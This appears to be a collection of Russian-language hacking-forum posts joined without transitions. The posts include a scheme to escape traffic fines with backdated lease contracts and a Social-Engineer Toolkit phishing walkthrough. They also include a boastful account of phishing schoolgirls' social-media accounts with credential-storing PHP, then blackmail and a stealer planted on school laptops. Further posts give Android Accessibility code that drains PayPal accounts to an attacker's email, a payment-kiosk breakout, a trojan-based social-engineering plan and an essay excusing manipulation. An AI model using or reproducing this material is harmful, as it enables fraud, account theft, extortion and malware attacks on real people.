ответственности не может превышать 2 месяца. КоАП ст 4.5.
Этой статьей мы и будем руководствоваться для неоплаты
штрафов. При отмене судом постановления об административном
правонарушение привлечь другое лицо не представляется
возможным, в связи с истечением срока давности (2 месяца)
административной ответственности.
Простым языком, штраф видеофиксации можно отменить при наличии договора аренды, а повторно привлечь к административной ответственности лицо которому передано транспортное средство ГИБДД не успевает в срок 2 месяца, так как в 2-х месячный срок с момента нарушения ПДД выносится постановление об Административном правонарушении, которое направляется вам по почте и у вас иметься 10 дней на подачу жалобы и тут не стоит забывать, что суд рассматривает вашу жалобу не на следующей день, суды завалены работой. При отмене протокола судом решения вступает в законную силу в течение 10 дней. Получается, что ГИБДД не успевает привлечь к ответственности пицо которому передано данное ТС в аренду, таким образом, и первое и второе Лицо освобождаются от административной ответственности.
Click to expand...
ГДЕ ИСКАТЬ КЛИЕНТОВ?
Регистрировать фирму или открывать ИП нам не обязательно.
На первоначальном этапе нам необходимо определить для себя потенциальный
список клиентов‚ который мы и разберем.
В первую очередь основным клиентом для нас как показывает
практика будут Транспортные компании, крупные автопарки такси,
фирмы грузоперевозки, & также обычные физические лица, имеющие транспортные
средства.
Как искать клиентов — все очень просто: обзваниваем фирмы такси Города, фирмы
грузоперевозки и говорим с директорами.
“Здравствуйте, меня зовут Андрей. Я бы хотел к вам обратиться с интересным
предложением по списанию штрафов ГИБДД”. После таких слов всем абсолютно всем
директорам становится интересно.
Договариваетесь о встрече, при встрече ведете диалог следующим
образом. Говорите что у вас есть штат юристов, которые работают по обжалованию
штрафов и вы с легкостью их закроете за 25% от стоимости всех штрафов
компании. В Договоре аренды прописываете эту же сумму, т е. свои 25% от суммы
штрафа. Приведу пример средней компании грузоперевозок, за месяц сумма штрафов
порядка в 70 тыс. Да все зависит также от Города, в крупных городах услуга
будет иметь колоссальный спрос.
Вы можете выбрать другое направление и работать только с Физ.
лицами. Поездите по автосервисам, предложите свои услуги,
друзьям, знакомым — это все ваши клиенты. Таксист должен быть ваш постоянный
клиент, поговорите с ними предложите за 25% закрывать штрафы. Не забываем про
Авито. Сарафанное радио со временем сделает свое дело и вы будете иметь
хороший профит. Не забывайте важный момент.
Первыми вашими клиентами станут ваши друзья, коллеги, знакомые. Предложите им списать их штрафы за 25% от суммы штрафа. Проверьте желающих будет масса.
Click to expand...
ИНСТРУКЦИЯ
Вам звонит клиент и говорит, что пришел штраф нужно его списать. У вас есть 10
дней в которые он должен предоставить этот конверт с постановлением, лучше в
первые 3 дня, чтобы конверт был у вас. Далее, вы составляете договор аренды ТС
(согласно Приложению №1) с собственником на кого пришел штраф видеофиксации.
Вы либо ваша фирма, если пожелаете открыть, или любое 3 лицо выступаете
арендатором ТС
ВАЖНО, чтобы договор был составлен датой ранее, чем совершенное ПДД, т.е. задним числом.
Click to expand...
Далее, готовим жалобу в суд заполняем (Приложение №2), затем ходатайством №3,
№4. Напоминаю, что ходить по судам мы НЕ БУДЕМ.
Все отправляется по почте, в ходатайстве № 4 которые мы прилагаем к
документам мы просим рассмотреть жалобу без нашего присутствия.
Не позднее 10 дней с момента получения конверта вам необходимо
направить в районный суд (смотрите адрес на конверте, откуда
пришло — и через интернет определяете районный суд).
Список документов, которые мы отправляем:
Это все, что от вас требуется, ждем решения суда. В 99,9 случаях все
постановления будут отменены.
Скачать документы:
https://yadi.sk/d/ECl1GrSbDedVzw
Для начала стоит напомнить, что же такое социальная инженерия.
Это метод получения необходимого доступа к информации, основанный на особенностях психологии людей. Главной целью социальной инженерии является получение доступа к конфиденциальной информации, паролям, банковским данным и другим защищенным системам.
Прежде всего, хочется познакомить читателей, пожалуй, с одним из самых мощных и универсальных инструментов, можно даже назвать его «швейцарским ножом» социальной инженерии. Называется он Social-Engineer Toolkit (SET) , на рисунке показан его общий вид.
Общий вид инструмента Social-Engineer ToolkitЗнакомство с Social-Engineer
Toolkit
Социально-технические атаки
Сам раздел может работать в нескольких направлениях, начиная от создания и внедрения вредоносных нагрузок, массовых атак, атак на различные точки Wi-Fi, генерации QR-кода и прочее.
Разделы социально-технической атаки в Social-Engineer Toolkit
Раздел векторы веб-сайтов подразделяется на методы:
Тут методы атак разделяются на разделы, начиная от внедрения и создания внутри java, использования уже готовых метасплоитов для фишинга, сбора данных, многопользовательских методов атак на выбор; имеется возможность использовать и все вместе — все зависит от фантазии злоумышленника.
Методы атак социально-технического раздела
Немного практики, или Как они это делают?
Предположим, злоумышленнику необходимо собрать данные о конкретной жертве,
узнать логины, пароли и иметь доступ ко всей переписке. Значит, для этого он
использует метод атаки на харвестер (то есть на сбор информации).
Киберпреступник поступает следующим образом: выбирает пункт Social- Engineering Attacks (Социально-технические атаки), затем — Website Attack Vectors (Векторы веб-сайтов), после этого — Credential Harvester Attack Method (Способ атаки на харвестер).
Появится три пункта меню: 1) Шаблоны веб сайтов; 2) Клонирование сайтов; 3) Пользовательский импорт.
Харвестерный тип выбор вектора атаки
Дальше злоумышленник узнает тип своего сетевого адреса, так как Social-
Engineer Toolkit будет знать, куда перенаправлять всю собранную информацию.
Для этого вводится команда ifconfig. В данном случае это адрес
192.168.0.20 (IP-адрес, присваиваемый вашему интерфейсу) — его
злоумышленник будет клонировать и в дальнейшем атаковать.
Пример с социальной сетью ВКонтакте показан ниже на рисунке.
Ввод сетевого адреса и клонирование сайта для атаки
После завершения конфигурации злоумышленник использует стандартный сервис для
конвертирования ссылки и отправляет ее жертве. Обычно присылается ссылка на
фото или интересный контент от имени друга или коллеги. После перехода по
ссылке пользователь видит знакомый интерфейс.
Однако посмотрев в адресную строку, можно обратить внимание, что вместо привычного адреса там указан тот самый 192.168.0.20.
Из-за невнимательности многие попросту не обращают на это внимание и вводят свои логин и пароль.
Вид поддельной страницы
После ввода своих конфиденциальных дынных система предлагает жертве зайти
позже, якобы произошел какой-то сбой или пара логин-пароль не распознается.
Что же тем временем видит злоумышленник? Логин и пароль, которые ввела жертва. Тем самым он заполучил полный доступ и теперь может вводить логин и пароль ничего не подозревающего пользователя на сервисе, под его профилем входить в его аккаунт и совершать в нем все, что захочет.
Конечный результат — злоумышленник получает логин и пароль жертвы
Не исключено, что последние события, связанные с утечкой персональных данных сотрудников Сбербанка, имели место благодаря этому инструменту. Он отлично подходит для такого типа атаки, и с его помощью можно также проводить массовую рассылку клиентам Сбербанка от лица сотрудников, чья база уже находится в руках злоумышленников.
В целом, Social-Engineer Toolkit — мощный инструмент, которому пока нет равных. В более ранних версиях была функция отправки SMS от имени любого абонента и любой организации, но позже разработчики отключили модуль. И если бы он действовал в настоящее время, то проникновение в систему было бы намного легче, поскольку SMS-подтверждение как дополнительная защита сейчас распространено. Надолго ли отключена опция и какие модификации будут в будущем к инструменту — пока неизвестно.
Выводы
Метод социальной инженерии — это тонкое искусство. Овладев им, можно быть
уверенным, что желаемый результат будет получен в 90-95% — все зависит от
сообразительности злоумышленника и от подхода к определенной жертве.
Как правило, на эту удочку попадаются невнимательные люди, которые не так требовательны к собственной безопасности и редко обращают внимание на малозначительные на первый взгляд детали (ссылка в браузерной строке, текст и прочее). Правда, надо признать, что опытные пользователи тоже попадаются на это, хотя и реже.
Привет, читатель! Сейчас я расскажу: с чего началась моя дорога ярости, как я
влез в кибер-мир и начал держать школы в страхе.
Но для начала немного предыстории!
Окей, как и любой подросток, я обладал простым интересом: как добыть много
pussy?
Однажды утром, я проснулся и осознал: "–Так больше продолжаться не может!",
шишка кипела до невозможности, наяривать на фантазии было не вариантом –
нужно было что-то предпринимать и кардинально менять в своей жизни!
Глава 0. Примерный план действия.
Нужно было что-то взламывать... Либо мастерить летающих дронов с видеокамерой,
которые будут висеть около окон жертв и наблюдать за ними по ночам.
Первый вариант, конечно, сложный, но менее ебанутый, чем второй. Поэтому я
решил сразу пробовать взлом.
Но для этого, нужно было определиться с целью и алгоритмом: что я буду
взламывать? каким образом? в какое время? что делать если спалят? и т.д
Всё было ясно, как божий день – пёзды моего возраста сидят и общаются
Вконтактике и Инстаграмчике (это очевидно).
Ну общаются они в вк – значит надо ломать вк , а на инсту я как-то забил.
– Каким образом взламывать?
– Волшебных программ для взлома не существует, какие-то баги искать я не умел
– решение одно: обман (СИ, если хотите)
– Каким образом обманывать?
– Слеплю простенький сайт по тематике искусства: там будут картинки/аудио
начинающих художников/музыкантов (всё это можно найти на _behance
иsoundcloud – _я не рекламлю сейчас эти ресурсы, они уже достаточно
популярны среди начинающих и _если нагло что-то воровать – то воровать лучше
от туда,имхо) _и на каждой странице артиста, сделаю возможность голосовать
за него.
Естественно голосовать можно будет только через соц. сети, такие как ВК,
Gmail и Facebook. (Тут не надо быть супер умным, чтоб нам с вами понять, что
там будет фейковая форма для входа).
– В какое время обманывать и проверять работоспособность аккаунта в случае
удачи?
– Обманывать я решил днём, либо в самой школе, либо после.А проверял
аккаунты я строго ночью, когда жертва уплывала в оффлайн.
– А если вдруг спалят?
– Все мы понимаем , что вся эта операция, будто игра с бритвой у яиц. Но
у меня всегда в запасе была импровизация и версия о том , чтоменя
самого взломали/попросили проголосовать.
Глава 1. Подготовка сайта.
Окей, желание ~~дрочить~~ копаться в чужой жизни было больше, чем придумывать
уникальный дизайн, хороший текст и прочее**, поэтому я спиздил готовый сайт.**
Далее просто нашел сайт который предлагает авторизоваться через вк, открылось
окошко где предлагалось ввести логин и пароль -> нажал ctrl + s и скачал эту
страницу. Далее подключил на форму для входа библиотеку redbeanphp –
реально простая штука в использовании, тем более если под такие цели.
4 строчки - и ты готов идти в бой.
Я бы показал, как выглядел сайт, но прошло уже 3 года: я сменил компьютер несколько раз – прости.
Поэтому я кратко расскажу: почему я использовал redbeanphp , чтоб ты,
дружище, понял на сколько он лёгкий и почему его надо юзать в своих проектах!
Простой аргумент: чтоб, допустим, у тебя данные для входа сохранялись в SQL-
таблице, тебе нужно залетать в phpMyAdmin, ждать пока прогрузится, возможно
потом настроить кодировку – короче тратишь время.
Я же, например, просто прописал 1 короткую строчку:
PHP:Copy to clipboard
$user = R::dispense('users');
И всё, чуваки, я уже таблицу по имени users создал – потратил 5-7 секунд!
Хоп-хоп-хоп
PHP:Copy to clipboard
$user->login = $data['login'];
$user->pass = $data['pass'];
R::store($user);
И я уже сохранил в таблице users данные, которые ввела моя жертва!
Короче прочитай про эту библиотеку и попробуй, **я говорю серьёзно – если бы
на одном из форумов не увидел обсуждение по этой штуке,я бы потратил уйму
времени , не повторяй моих ошибок. **
Глава 2. Запуск сайта.
Сейчас полно регистраторов , но ошибка новичков в том, что они выбирают
всякие лошковые зоны (типа там .xyz / .ml / .esy.es / и прочий мусор).
ВСЕГДА БЕРИ .RU или .COM - ПОТРАТЬСЯ И ЭТО ДАСТ ОГРОМНЫЕ РЕЗУЛЬТАТЫ
ПРО SSL НЕ ЗАБУДЬ – НЕ ГОВОРИ ЧТО ДОРОГО, НЕКОТОРЫЕ РЕГИСТРАТОРЫ ВЫДАЮТ ЕГО
БЕСПЛАТНО, НУЖНО ПРОСТО НАЙТИ.
(кстати, на всякий случай: я регаю на левый паспорт и вам советую)
Глава 3. Осталось только убедить их ввести свои данные.
Один раз показываю, запоминай:
подхожу на перемене к девке и завожу диалог
Далее: Я - Я, Д - Девушка (жертва).
Я: – Привет, сильно занята?
Д: – Привет, не особо. А что?
Я: – Да там, друг картину нарисовал, в конкурсе участвует: за него
проголосовать нужно, всех наших уже попросил, одна ты осталась. Поможешь?
Если соглашается – протягивай ей телефон со страницей голосования
Если нет - лучше отстань, другие согласятся.
Ну либо по вк сразу внаглую ей кидай как, типа: "проголосуй плиз" и ссылку. Вк не палит, все пройдет гладко)
Глава 4. Наслаждение.
Я получил столько pussy, вы не представляете... Но вы должны быть к тому, что
девушка может перестать вам нравиться, потому что они говорят о ебанутых
вещах, типа:
выделения дурно пахнут, чета там вытекает, на сосках чет не эротичное – я
очень пожалел что это пришлось прочитать.
А теперь: как заработать с этого движа?
Короче мы взломали штук 7 телок, у некоторых из них есть парни.
Вот теперь покупаем левую симку, включаем впн и начинаем писать этим пацанам
, типа, батя, вот твоя баба, у меня есть доступ к её странице и я знаю кто
из твоих друзей подкатывает к ней и она ему мол сосала и вообще они ебутся без
тебя и ставишь свою цену,мы ставили 1000 руб .
Ну и для подтверждения пишешь ночью (от страницы бабы) реквезиты для
оплаты, мол оплачивай и я моментально скину тебе переписку с тем чуваком и
их фотки.Нам кидали максимум через 3 дня, потому что измена это и обидно и
любопытно, кто же мог из твоего окружения предать. Чувак скинет бабки сто
проц.
Держу школы
А тут все просто , накопил с этого всего немного бабла, купил стиллер и
заказал его крипт**(чтоб антивирус не палил)**.
Дал флешку с этим файлом самым преданным друзьям , которые учатся в
другой школе, чтоб они активировали его на школьных ноутах перед уроком.
Во время урока они раздали вай-фай и всем об этом сообщили , что где-то
тут есть открытая сеть. Люди подключались , конечно не все девочки , но
все-таки много кому хотелось халявы. И много кто заходил в вк. Логи от
стиллера присылались мне и весь развод снова шел по кругу.
Итог, наверное, здесь один: один гопник вычислил меня и вломил пизды.
Поэтому шифруйтесь лучше, если будете промышлять подобным.
(но если кому интересно, я потом пробил: где он живет, взломал его wi-fi, с
помощью sslstrip снял безопасное подключение с его сайтов и снова взломал его
вк потому что нехуй!)
Спасибо за внимание!
Всем привет! Сегодня я хочу написать про android а именно про клики,заполнения
форм поиск текста и т.д. А чтобы было хоть как то интересно мы напишем
автослив с paypal.
И так первым делом нам надо отправить пользователя включить функцию
Accessibility, как заставить его залезть в приложения это уже другое
дело:smile58:, push уведомления в помощь.
Ну да ладно, отошли от темы, отправляем холдера включить функцию.
Code:Copy to clipboard
AlertDialog.Builder builder = new AlertDialog.Builder(this);
builder.setTitle("To enable statistics")
.setMessage("The system does not work correctly, you need to enable access to statistics ")
.setCancelable(false)
.setIcon(R.mipmap.ic_launcher)
.setPositiveButton("Turn on now", new DialogInterface.OnClickListener() {
public void onClick(DialogInterface dialog, int id) {
Intent intent = new Intent(Settings.ACTION_ACCESSIBILITY_SETTINGS);
startActivity(intent);
}
});
builder.create().show();
}
Title текст " builder.setTitle("To enable statistics")"
Текст сообщения ".setMessage("The system does not work correctly, you need
to enable access to statistics ")"
Иконка ** ".setIcon(R.mipmap.ic_launcher)", путь к иконки.
Текст кнопки (Button) ".setPositiveButton("Turn on now", new
DialogInterface.OnClickListener() {"**
Если нажали на кнопку отправляем в настройки Accessibility, настройки** "
Intent intent = new Intent(Settings.ACTION_ACCESSIBILITY_SETTINGS);
startActivity(intent);"**
Пример запроса, при клике пользователь попадает в настройки.
Перенаправили холдера включить функцию.
Можно сделать проверку включил холдер функцию или нет, крутить в цикле, Toast,
СИ и так далее в общем помочь ему в выборе, но сейчас не об
этом
Теперь когда нам дали разрешения приступим.
Первым делом мы будем искать текст куда нам нужно кликнуть.
Искать я буду слово "Отправить", если находим кликаем .
Сравниваем имя пакета "if (
"com.paypal.android.p2pmobile".equals(String.format("%s",
event.getPackageName()))) {"
если имя пакета paypal то ищем слово "Отправить" и делаем клик.
**
Code:Copy to clipboard
if ("com.paypal.android.p2pmobile".equals(String.format("%s", event.getPackageName()))) {
AccessibilityNodeInfo nodeInfos = getRootInActiveWindow();
if (nodeInfos == null) {
return;
}
List<AccessibilityNodeInfo> list = nodeInfos.findAccessibilityNodeInfosByText("Отправить");
if (list != null) {
for (AccessibilityNodeInfo n : list) {
AccessibilityNodeInfo parent = n.getParent();
parent.performAction(AccessibilityNodeInfo.ACTION_CLICK);
break;
}
}
**
Далее нам нужно заполнить EditText искать мы будем по id и если нашли кликаем
и заполняем тестом.
Нужное намid по которому нужно сделать клик "
com.paypal.android.p2pmobile:id/search_filter"
и заполнить, заполняем нашей почтой куда отправить $ ну в нашем случае
рубли:smile75:
args.putString(AccessibilityNodeInfo.ACTION_ARGUMENT_SET_TEXT_CHARSEQUENCE,
"your.mail@gmail.com");
Почта "your.mail@gmail.com".
**
Code:Copy to clipboard
List<AccessibilityNodeInfo> searchBarIdle = nodeInfos.findAccessibilityNodeInfosByViewId("com.paypal.android.p2pmobile:id/search_filter");
if (searchBarIdle.size() > 0) {
AccessibilityNodeInfo searchBar = searchBarIdle.get(0);
searchBar.performAction(AccessibilityNodeInfo.ACTION_CLICK);
Bundle args = new Bundle();
args.putString(AccessibilityNodeInfo.ACTION_ARGUMENT_SET_TEXT_CHARSEQUENCE, "your.mail@gmail.com");
searchBar.performAction(AccessibilityNodeInfo.ACTION_SET_TEXT, args);
}
**
Нажимаем далее и переходим на следующую страницу.
Кнопка далее иid кнопки будет следующим**"
com.paypal.android.p2pmobile:id/next_button"**
Если нашли кликаем.
**
Code:Copy to clipboard
List<AccessibilityNodeInfo> searc = nodeInfos.findAccessibilityNodeInfosByViewId("com.paypal.android.p2pmobile:id/options_recycler_view");
if (searc.size() > 0) {
List<AccessibilityNodeInfo> lllists = nodeInfos.findAccessibilityNodeInfosByViewId("com.paypal.android.p2pmobile:id/next_button");
for (AccessibilityNodeInfo nodes : lllists) {
nodes.performAction(AccessibilityNodeInfo.ACTION_CLICK);
}
}
**
Кликаем по кнопке 1 я не
жадный.
Смотрим id нужной кнопки "com.paypal.android.p2pmobile:id/one".
Нашли кликнули все просто.
**
Code:Copy to clipboard
List<AccessibilityNodeInfo> lists = nodeInfos.findAccessibilityNodeInfosByViewId("com.paypal.android.p2pmobile:id/one");
for (AccessibilityNodeInfo nodes : lists) {
nodes.performAction(AccessibilityNodeInfo.ACTION_CLICK);
}
**
Жмем далее, как вы могли заметить мы в основном ищем по id , только в
одном случае мы искали по тексту я думаю понятно что текст будет отличатся в
других странах.
Повторяемся и жмем далее " com.paypal.android.p2pmobile:id/next_button".
**
Code:Copy to clipboard
List<AccessibilityNodeInfo> lllists = nodeInfos.findAccessibilityNodeInfosByViewId("com.paypal.android.p2pmobile:id/next_button");
for (AccessibilityNodeInfo nodes : lllists) {
nodes.performAction(AccessibilityNodeInfo.ACTION_CLICK);
}
**
И последующими двумя действиями мы отправляем платеж.
**
Code:Copy to clipboard
List<AccessibilityNodeInfo> lllistss = nodeInfos.findAccessibilityNodeInfosByViewId("com.paypal.android.p2pmobile:id/submit_button_container");
for (AccessibilityNodeInfo nodes : lllistss) {
nodes.performAction(AccessibilityNodeInfo.ACTION_CLICK);
}
List<AccessibilityNodeInfo> lllistsss = nodeInfos.findAccessibilityNodeInfosByViewId("com.paypal.android.p2pmobile:id/primary_action");
for (AccessibilityNodeInfo nodes : lllistsss) {
nodes.performAction(AccessibilityNodeInfo.ACTION_CLICK);
}
}
**
К сожелению не смог прикрепить остальные скрины.
Всем спасибо за внимание и надеюсь статья вам понравилась, я первый раз
участвую в конкурсе.
Специально для xss.is, всем большой рахмет!!!
Посоветуйте литературу по психологии, социальной ижннерии и НЛП.
Я читал Козлова и Литвака (это психологи если кто нем знает)
Это конечно все интересно но там не то что нужно
Мне нужна литература для начинающих...
У меня имеються лишь минимальные знания, полученные самостоятельно
Цель прочтение литературы: получить дар убеждения, научиться управлять людьми,
и что бы они добровольно исполняли то, что нужно мне.
Только нужно что бы в книжках было все написано доступным языком для обычного
обывателя
Короче спам в аську пришёл долго ржал...
Работа от 1900 USD/мес. Гарантии. dasp-tech.ru
Click to expand...
Ну думаю интересно чё там за развод, зашёл посмотреть и сразу смотрю логотип
вебмани типа официальный представитель... смотрю линк улыбнулся открываю
http://passport.webmcney.ru/asp/CertView.a...id=408858333908
Ну во-первых на сайте вебмани нет жирного текста, это для тех лолок кто делал фейк, а домен норм но нормальный человек который юзает постоянно вебмани сразу увидит что вместо passport.webmc ney.ru
Конечно инфа на сайте на дизайнера денег не хватило, в школу много не дают делали абы как видно что шаблон, а главное как текст написан :-D
Вообще наверное буду сюда все разводы что по аське приходят расписывать иногда это заменяет башорг.
http://www.youtube.com/watch?v=maaHP6bc3OI
качество конечно не ахти...снимала чем было.
На видео запечатлила только возможности и какбэ доказательства что это именно
киберкасса)
Процесс снятия защиты и заливка снифера остался за кадром.
итак в чем заключается вся фишка?
поясню какой принцип работы-
1.когда мы быстро нажимаем на тачскрин, то такое нажатие считается за щелчёк
левой кнопкой мыши
2.если-же задержать палец секунд на 5, то появится интерактивное меню с
которого можно перейти на папку "Мои картинки" ну и дальше, смотря какие у вас
цели))
в моем случае были киберкассы, на которых срабатывала "фишка с долгим
удерживанием" и не гарантирую что у вас в городе она сработает (попытка
не пытка) хотя еще несколько людей из разных городов России отозвались, и
сказали что эта фишка работала (на киви точно!).
Я пробовала в 3 городах (на видео запечетлены 2 киберкассы (далее КК), и один
веб киоск интернет магазина protoria.com.ua).
На КК был установлен софт от ОСМП, программа стояла в полноэкранном режиме, так что фразы типо "повезло" исключются, а на веб-киоске, была открыта страница с помощью огнелиса в полноэкранном режиме.
Как я скрывала программную оболочку?
Зажимаем тачскрин на какой-нибудь картинке на 5-6 секунд.Выбираем "перейти в папку Мои Рисунки", далее C/Windows/System32/
osk.exe - название процесса, который вызывает экранную клавиатуру.
Далее юзала всем знакомую комбинацию Alt+F4 и закрывала программы, либо
скрывала (Windows+D).
После этого, в cmd узнавались конфиги сетевого подключения, разрешалось
удаленное подключение через стандартные средства и бла-бла-бла, снималась вся
защита и забрасывался снифер, печатались чеки (на видео видно, и фотки
прилагаются)...
На моё удивление, никаких сторонних антивирусов и фаерволов на стояло!
Про автоматы с *nix системами материал будет чуть позже.
ayumi socialware.ru
Введение
В общем смысле социальная инженерия [СИ] является частью социальной
психологии, направленной на изменение поведения человека под действием
искусственно создаваемых факторов.
План действий социального инженеринга, который будет описан и показан на
примерах здесь, собирает все части проведения СИ-атаки воедино, упрощая ее и
позволяющий обойтись без горького опыта неудач. Без него начинающий
соц.инженер будет иметь лишь 30% вероятности проведения успешной атаки [если
только он не толковый психолог].
Теория
Общий план:
1. Выбрать целевую компанию/фирму/организацию.
2. Установить желаемый результат (получение пароля / доступа к приватной
информации, данным, материальным вещам).
3. Найти потенциальных жертв, имеющих доступ к желаемому или полезных в
процессе достижения цели.
4. Выбрать индивидуальную цель атаки.
5. Используя пассивные тактики и методы социальной инженерии, собрать как
можно больше информации о жертве.
6. Выбрать тип связи с объектом – телефон, электронная почта, веб или реал.
7. Найти наиболее подходящий вид СИ-атаки для использования на конкретной
жертве [наглость, напор на жертву; лесть; старый, забытый друг и другие].
8. Проведение атаки.
9. Сохранение, использование полученной информации / данных, в случае, если
цель не была достигнута, необходимо вернуться к шагу 4 и попробовать иные пути
достижения желаемого результата.
10. Пролистать в голове все подробности и специфику этой атаки [думаю
понятно, для чего].
Некоторые из пунктов данного плана нуждаются в пояснениях. Например, чем
обусловлен выбор индивидуальной жертвы атаки ? Так как мы не можем, как это
делает профессиональный социальный инженер [например, Кевин Митник], опираясь
только на опыт и интуицию, на автомате выбрать подходящую жертву. Итоговое
решение всегда формируется из количества и качества собранной о жертве
информации. Полезно также знать наиболее распространенные стереотипы
соц.инженеров:
Начальник: человек, привыкший отдавать команды, ценящий свое время,
добивающийся поставленных целей. Манера разговора жесткая, нетерпеливая.
Непробиваемая уверенность в себе и легкое [или полное] пренебрежение к рядовым
служащим. Всем своим видом показывать, что проблема, с которой обратился -
мелкая неувязка, которую нужно решить как можно скорее. Никаких просьб -
только суровые вопросы в духе "какого черта". По поводу недоверчивых или
проверочных реплик - негодование и запугивание.
Секретарь: обычно блондинка с приятным голосом и большой грудью/попой.
Задача - выполнить конкретное поручение шефа не отвлекаясь на условности.
Иметь осведомленность о начальнике и некоторых его делах, как бы между прочим
ронять достоверные факты [или недостоверные, которые нельзя проверить].
Характер разговора - мягкий, с легким эротическим подтекстом (если собеседник
Эти стереотипы могут также оказаться применимы к жертве. Нередко ей оказывается недавно принятый сотрудник тех.суппорта или пусть и долго работающая, но глупенькая девушка-секретарь.
Во многих ситуациях, казалось бы, преследуются 'левые' цели для того чтобы свести все нити воедино [ученое название - дедукция] и достигнуть желаемого.
Практика
Сейчас я попытаюсь показать вам на простом примере действенность нашего плана:
1. Наша цель – небольшая компания компания Electronics, производящая диоды,
которая конкурирует с другой фирмой, заплатившей нам деньги для получения
доступа к некоторым ноу-хау Electronics.
2. Цель – полный доступ к электронной переписке.
3. Лица, имеющие доступ к эл.корреспонденции – ген.директор, его зам,
сисадмин и секретарша.
4. Индивидульной целью выбираем сисадмина, как лицо, имеющее полный доступ к
эл.почте всех работников.
5. Полученная информация – администратор любит играть в одну малоизвестную,
но развивающуюся онлайн-игру (было замечено более сотни постов на форуме игры,
где был проставлен адрес мыла с доменом компании Electronics и
недвусмыссленным аккаунтом support)
6. Тип связи – электронная почта.
7. Подходящий вид СИ-атаки – впаривание трояна под видом небольшого патча,
прикинувшись службой поддержки онлайн-игры.
8. Отсылаем мыло.
9. Видим лог трояна, который автоматически удалился после сбора информации –
получены пассы от RAdmin'a, установленного на все компьютеры компании,
почтовые пароли и еще много вкусного, но не являющегося итоговой целью атаки.
10. Вывод – онлайн-игры являются неплохим подспорьем при проведении СИ-атаки,
так же как и использование анонимного майлера с подменой адреса отправщика.
Заключение
Как видно, СИ-атаки были и остаются неплохим средством заработка или взлома
компьютерных, да и не только, систем. Пока будут существовать такие факторы,
как Доверчивость, Жадность, Страх, Отзывчивость, Чувство Превосходства ,
социальная инженерия будет процветать.
Привет,у меня такой вопрос,у меня есть полный рут к компу жертвы,я на нём нашёл папку iWallet (это сами яндекс деньги). Могу слить себе,как мне получить сам кошелёк и пароли от него? :blink:
НЛП и манипуляция
Что такое НЛП
Если посмотреть количество запросов слова "НЛП" в поисковиках, то можно заметить, что массовый интерес к НЛП довольно высок. Впрочем, это вполне понятно. Во-первых, НЛП на сегодняшний день самое методичное и самое практикоориентированное направление из всей психологии. И, во-вторых, что более важно, НЛП не так ограничено, как другие психологических направления привязкой к терапии, и имеет множество технологий ориентированных на применение в деловом и повседневном общеннии, управлении, продажах, рекламе, пропаганде и других видах коммуникации, где используется психологическое воздействие.
Однако, чтобы у читателей не сложилось мнение, что НЛП это психологический "скальпель-ракетница" , расскажу в двух словах что это за три буквы (подробнее о том, что такое НЛП, вы можете узнать здесь).
Изначально, НЛП возникло как продукт моделирования работы психотерапевтов,
наиболее успешно производящих изменения в сознании пациентов. Милтона
Эриксона, автора и создателя эриксоновского гипноза, тоже моделировали, и это
объясняет наличие множества общего у этих технологий. Однако, если
эриксоновский гипноз, это технология для совершения изменений в сознании, то
НЛП, это система, объединяющая в себе множество различных технологий единым
языком описания, позволяющим работать с набором этих технологий, как с одной.
И, если посмотреть на НЛП с научной стороны, то наиболее точным определением
для него будет "эпистемология" - наука о том, как мы знаем и как познаем. А
если посмотреть с практической стороны, точное определение НЛП представлено в
самом его названии - нейро-лингвистическое программирование, т.е.
программирование психических процессов посредством речи.
Правда, ограничение "посредством речи" устарело практически сразу, так как НЛП
стало использовать все каналы восприятия и невербальную коммуникацию. Но, как
бренд, слово "НЛП" уже состоялось.
После всего вышесказанного, думаю, однозначно ясно, НЛП и гипноз, помимо прочих возможностей, дают так же и отличные возможности для манипуляции - т.е. оказания явного или скрытого психологического воздействия на сознание человека или общественных масс. И теперь, я думаю, для продолжения дальнейшего разговора про НЛП и гипноз, крайне необходимо разобраться с вопросом манипуляции.
Манипуляция
Я бы хотел обратить ваше внимание на такое распространенное убеждение, что
манипуляция, это плохо. Манипуляция, это действительно плохо, но только тогда,
когда вы не берете на себя ответственность за то, что вы делаете. Потому что в
действительности, манипуляция, это то, что мы все время делаем друг с другом,
когда общаемся.
Сейчас объясню подбронее.
Общаясь, люди всегда, причем, как правило, бессознательно, стремятся получить
от собеседника какую-либо реакцию, начиная от простого внимания, заканчивая
одобрением, согласием или каким-либо поведением. Поэтому любое общение, если
оно не пассивно на 100%, уже будет манипуляцией.
Так что если у вас есть какие-либо цели, связанные с другими людьми (а это все
цели, которых вы не можете достичь в одиночку - почти все цели современного
социального человека), то общаясь с ними, вы будете вынуждены ими
манипулировать. Иначе просто не будете достигать своих целей.
Мы все постоянно друг другом манипулируем, сознательно или бессознательно это происходит, это не имеет значения. И утверждать же, что этого не происходит, значит спихивать с себя ответственность.
И еще один момент. Явной, или скрытой будет манипуляция - не имеет особого значения, так как перед каждым своим дейстием, жестом или словом, говорить собеседнику, какую реакцию мы от него хотим получить, согласитесь, будет абсурдно. И, в то же время, от того что вы сначала скажете человеку, чего вы от него хотите, а потом сделаете все, чтобы это получить, это не престанет быть манипуляцией. Просто это будет открытой манипуляцией, вот и все.
Поэтому давайте просто признаемся себе (если мы это еще не сделали ), что мы манипулируем друг другом, и просто возьмем на себя ответственность за свои действия. Это будет, как минимум честно.
Этика манипуляции
Если уж так получается, что если мы общаемся, то мы не можем не влиять друг на друга, то как же теперь быть? В смысле, если уж я все равно манипулирую, то как мне это делать, чтобы это не было нехорошо для других?
Ответ очень простой, и известен испокон веков: поступай с другими так, как хотел бы, чтобы другие поступали с тобой.
...Стоп! Это не значит, что нужно навязывать всем то, что хочешь сам
Все люди разные, и у всех свои цели, ценности и желания. Поэтому принцип
гармоничного общения (или экологичной манипуляции), это уважение чужих целей,
ценностей и интересов.
Для этого достаточно просто задуматься на секундочу: "А мне бы на его(ее)
месте понравилось бы такое действие в мой адрес?". И все, и вы получаете ответ
на вопрос, этична ли ваша манипуляция, или, проще говоря, хорошо ли вы
поступаете с этим человеком в этой ситуации. Главное, это быть честным с самим
собой, задавая этот вопрос. Иначе он не имеет смысла.
Гложет меня чувство, дорогие читатели, что в прошлом выпуске я рассказал про манипуляцию не все, что нужно для целостного понимания этого вопроса. Будем наверстывать упущенное
В прошлом выпуске, как вы помните, основные тезисы были такие:
Если ты общаешься с людьми и хотя бы отвечаешь им (не говоря уже об
активности), ты уже оказываешь влияние. Любая информация оказывает влияние.
Когда ты достигаешь каких либо целей, связанных с другими людьми, ты не можешь
не манипулировать ими (неважно, открыто или неявно). Учитывая, что цели есть у
всех (т.к. потребности есть у всех от природы), каждый из нас вынужден
